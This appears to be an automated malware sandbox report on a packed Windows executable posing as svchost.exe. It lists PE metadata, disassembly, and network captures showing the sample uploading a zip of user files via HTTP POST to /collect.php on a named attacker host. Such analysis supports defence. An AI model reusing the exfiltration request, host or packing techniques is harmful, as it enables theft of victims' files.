Thumbprint SHA-1:	2485A7AFA98E178CB8F30C9838346B514AEA4769
Thumbprint SHA-256:	C0772D3C9E20C3F4EBB09F5816D6DADA0D8FA86563C2D68898539EC1CD355A1B
Serial:	3300000187721772155940C709000000000187

Entrypoint Preview

Instruction
call 00007F54F4D4DDE6h
jmp 00007F54F4D4DBFEh
push 0044BB60h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [00466ECCh]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
mov ecx, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
int3
int3
int3
add esp, 04h
jmp 00007F54F5136D8Dh
sub eax, 0D28FD95h
clc
stc
loopne 00007F54F4D4DDDEh
imul esi, ebp, 90h
xor byte ptr [277D298Eh], ch
lds ecx, fword ptr [esi]
salc
lea ecx, dword ptr [EDFA7B94h]
cli
mov esi, 902A6054h
imul ebx, dword ptr [ebx+77h], A8h
inc eax
inc ebx
popfd
cmc
xchg eax, esi
mov dh, 2Fh
inc esi
mov eax, C13DB70Ah
cmp byte ptr [eax], FFFFFF96h
sub byte ptr [ecx-74FBCF8Fh], dl
fcmovnbe st(0), st(3)
retn A9BCh
pop ebx
fidiv word ptr [esi-06h]
xor eax, 47FFA7CAh
fst qword ptr [esi-1F67CA6Dh]
or eax, B71647ADh
test al, BAh
leave
out dx, al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x32d050	0x290	.micro
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x16a5a8	0x23a8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x32d030	0x10	.micro
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x32d000	0x18	.micro
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x86000	0x41c00	False	0.9988043607414449	data	7.998749454200034	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x87000	0x1b000	0xbc00	False	0.997319647606383	data	7.994094496471131	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0xa2000	0x5000	0x600	False	0.802734375	data	6.701628443267699	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0xa7000	0x7000	0x4e00	False	0.9823217147435898	data	7.955304346106002	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0xae000	0x27f000	0x2ba00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.micro	0x32d000	0xea000	0xe9800	False	0.9958825448340471	data	7.974038627658711	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
user32.dll	MessageBoxA
advapi32.dll	RegCloseKey
oleaut32.dll	SysFreeString
gdi32.dll	CreateFontA
shell32.dll	ShellExecuteA
version.dll	GetFileVersionInfoA
SHLWAPI.dll	PathFindExtensionW
gdiplus.dll	GdipSaveImageToFile
WININET.dll	InternetWriteFile

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2022 14:21:46.952979088 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.006584883 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.006706953 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.007730007 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.007888079 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.008369923 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.071840048 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.071871042 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.072060108 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.072190046 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.072215080 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.072283983 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.072309971 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.072361946 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.072422028 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.125600100 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.125720978 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.125749111 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.125761032 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.125924110 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.125937939 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.126157999 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.126946926 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.180526018 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.180546999 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.180557966 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.180654049 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.180716038 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.180799007 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.180845976 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.180949926 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.181332111 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.181344986 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.181479931 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.234474897 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.234559059 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.234589100 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.234888077 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.234940052 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.234972000 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.235002995 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.235027075 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.235053062 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.235260010 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.235315084 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.235318899 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.235343933 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.235344887 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.235362053 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.235371113 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.235399008 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.235605955 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.235644102 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.235672951 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.235723972 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.288664103 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.288691998 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.288703918 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.288722992 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.288829088 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.288878918 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.289082050 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.289115906 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.289403915 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.289521933 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.289676905 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.289716005 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.289880037 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.289959908 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.290035963 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.290076971 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.290327072 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.290576935 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.290724993 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.290885925 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.291049004 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.291238070 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.291361094 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.291364908 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.291376114 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.291424990 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.291430950 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.291491985 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.291507006 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.291522026 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.291539907 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.291611910 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.291722059 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.291743994 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.291877985 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.292505980 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.292656898 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.292669058 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.292735100 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.292784929 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.292928934 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.293023109 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.293054104 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.293111086 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.293333054 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.293363094 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.293401957 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.293421030 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.344630957 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.344662905 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.344680071 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.344722033 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.344752073 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.344804049 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.344824076 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.345007896 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.345192909 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.345330000 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.345463037 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.345520020 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.345602989 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.345644951 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.345679045 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.345705986 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.345747948 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.345797062 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.345824003 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.345890045 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.345926046 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.346159935 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.346191883 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.346208096 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.346239090 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.346278906 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.346290112 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.346319914 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.346498013 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.346615076 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.346713066 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.346781969 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.346828938 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.346857071 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.346899033 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.346957922 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.346981049 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.347225904 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.347249985 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.347269058 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.347337961 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.347487926 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.347610950 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.347623110 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.347631931 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.398612976 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.398638010 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.398649931 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.398660898 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.398880005 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.398966074 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.399097919 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.399214029 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.399302006 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.399338007 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.399350882 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.399362087 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.399363995 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.399373055 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.399426937 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.399476051 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.399544954 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.399596930 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.399696112 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.399753094 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.400165081 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.400207996 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.400233030 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.400549889 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.400696039 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.400731087 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.401158094 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.401175976 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.401527882 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.401639938 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.401721001 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.401791096 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.452620983 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.452672005 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.452742100 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.452903032 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.453097105 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.455213070 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.455248117 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.455318928 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.455348969 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.455485106 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.455830097 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.455857038 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.455921888 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.455949068 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.456096888 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.456343889 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.456521034 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.456585884 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.456614017 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.457104921 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:47.736341000 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:47.790251017 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:48.235774994 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:48.289609909 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:48.289776087 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:48.343395948 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:48.343425989 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:48.343597889 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:48.397713900 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:48.397845030 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:48.400820017 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:48.468919992 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:48.469115973 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:49.388959885 CEST	80	49764	141.8.197.42	192.168.2.7
Jun 9, 2022 14:21:49.389036894 CEST	49764	80	192.168.2.7	141.8.197.42
Jun 9, 2022 14:21:50.325393915 CEST	49764	80	192.168.2.7	141.8.197.42

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2022 14:21:46.850735903 CEST	63557	53	192.168.2.7	8.8.8.8
Jun 9, 2022 14:21:46.933648109 CEST	53	63557	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 9, 2022 14:21:46.850735903 CEST	192.168.2.7	8.8.8.8	0xf432	Standard query (0)	asdqwezxc.ru.xsph.ru	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 9, 2022 14:21:46.933648109 CEST	8.8.8.8	192.168.2.7	0xf432	No error (0)	asdqwezxc.ru.xsph.ru		141.8.197.42	A (IP address)	IN (0x0001)
Jun 9, 2022 14:21:50.182743073 CEST	8.8.8.8	192.168.2.7	0x6bd2	No error (0)	a-0019.a-msedge.net	a-0019.a.dns.azurefd.net		CNAME (Canonical name)	IN (0x0001)
Jun 9, 2022 14:21:50.182743073 CEST	8.8.8.8	192.168.2.7	0x6bd2	No error (0)	a-0019.a.dns.azurefd.net	a-0019.standard.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jun 9, 2022 14:21:50.182743073 CEST	8.8.8.8	192.168.2.7	0x6bd2	No error (0)	a-0019.standard.a-msedge.net		204.79.197.222	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

asdqwezxc.ru.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49764	141.8.197.42	80	C:\Users\user\Desktop\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 14:21:47.007730007 CEST	886	OUT	POST /collect.php HTTP/1.1 Content-Type: multipart/form-data; boundary=SendFileZIPBoundary User-Agent: uploader Host: asdqwezxc.ru.xsph.ru Content-Length: 808811 Connection: Keep-Alive Cache-Control: no-cache
Jun 9, 2022 14:21:47.007888079 CEST	886	OUT	Data Raw: 2d 2d 53 65 6e 64 46 69 6c 65 5a 49 50 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 54 6f 55 70 6c 6f 61 64 22 3b 20 66 69 6c 65 6e 61 Data Ascii: --SendFileZIPBoundaryContent-Disposition: form-data; name="fileToUpload"; filename="zipfile.zip"Content-Type: application/zip
Jun 9, 2022 14:21:47.008369923 CEST	898	OUT	Data Raw: 50 4b 03 04 14 00 02 00 08 00 ac 72 c9 54 50 c4 cc 6b 84 02 00 00 02 04 00 00 1f 00 11 00 46 69 6c 65 73 2f 66 72 6f 6e 74 64 65 73 6b 2f 4b 5a 57 46 4e 52 58 59 4b 49 2e 78 6c 73 78 55 54 0d 00 07 f2 01 a2 62 f2 01 a2 62 f2 01 a2 62 15 93 d9 b5 Data Ascii: PKrTPkFiles/user/KZWFNRXYKI.xlsxUTbbbe!D{gQ)pr'Z52&e-]BA&FGhe]S[3K96d?N:VfFSD}[`7w2iK;Q-f;#1:OP*U0sg
Jun 9, 2022 14:21:47.072060108 CEST	919	OUT	Data Raw: ac 38 c3 b2 0c ac e2 9f 7f a7 a7 97 f0 cf 2d e8 eb a1 8a b8 52 20 17 6e be ab ea 31 83 bd cb 5e e8 5a 71 24 9b 73 29 08 7e 14 9b f1 72 c1 f7 e4 67 4b 5e 06 b4 5a d1 eb 87 84 b3 dd 3d f6 b0 bc 88 3c 3a a7 b2 d1 8d 29 e5 65 26 a1 d6 7d 8a 34 8c b9 Data Ascii: 8-R n1^Zq$s)~rgK^Z=<:)e&}4C{ S\|f)p9\|D=\oOzw:4H&1S_D:8FK5O*AFBiy!u-yI^{Yy5b0G\|a#
Jun 9, 2022 14:21:47.072283983 CEST	921	OUT	Data Raw: 10 c2 d6 82 df 69 73 0e 67 1c ad 0c 80 f2 04 23 ef fd 91 3e b2 6e 19 86 6c 0d 2d 4b db e8 75 d7 4e 4f 30 dc 61 40 4d 4e 0b 50 ba 68 6e f8 14 69 47 c2 80 87 3d 47 73 ee db de 58 78 ee 70 1c c5 97 a6 90 c2 d2 b7 90 da 22 d7 dc c6 87 95 3e 19 8b e4 Data Ascii: isg#>nl-KuNO0a@MNPhniG=GsXxp">7BrlrB0/ :Z(8a7b&()c[,!J7/ssw`D%05OsJbgHs2L9r>=5S%N/)n*H-u"u`7,
Jun 9, 2022 14:21:47.072361946 CEST	932	OUT	Data Raw: cf 85 ec 2c 47 e6 c7 6e c2 b7 7d e1 b5 cc 8c e7 f7 a2 6a 9b 48 9c 6b f0 6b 7e 81 6b e4 61 e1 21 d9 3a ee 46 95 74 21 5c c4 1e e0 a5 2e 6f c5 7d 81 8e 77 f1 d0 ae 3a ec 21 04 57 e0 96 25 54 46 d9 03 2f 75 94 02 42 fb 66 1d ff fa c5 88 1a 28 70 08 Data Ascii: ,Gn}jHkk~ka!:Ft!\.o}w:!W%TF/uBf(pym6;{ 8p/wrg`Z<l#7SVj3_:DUBO[Y&*~n:{u/tD -xJQ\|.3;yQ`,r
